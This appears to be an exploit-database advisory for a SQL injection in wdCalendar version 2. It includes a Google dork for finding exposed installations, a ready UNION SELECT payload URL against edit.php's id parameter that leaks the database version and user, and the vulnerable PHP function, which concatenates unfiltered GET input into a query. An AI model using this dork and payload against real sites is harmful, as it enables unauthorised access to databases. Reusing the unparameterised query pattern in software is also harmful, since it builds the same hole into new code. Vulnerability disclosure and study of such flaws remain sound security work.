wdCalendar 2 - SQL Injection



EKU-ID: 5860 CVE: OSVDB-ID:
Author: Alfonso Castillo Angel Published: 2016-09-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps
 
 * Affected file -> edit.php and edit.db.php
 * Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
 
 
 * Vulnerable code:
 
 function getCalendarByRange($id){
  try{
    $db = new DBConnection();
    $db->getConnection();
    $sql = "select * from `jqcalendar` where `id` = " . $id;  //the
variable is not filtered properly
    $handle = mysql_query($sql);
    //echo $sql;
    $row = mysql_fetch_object($handle);
}catch(Exception $e){
  }
  return $row;
}
if($_GET["id"]){
  $event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly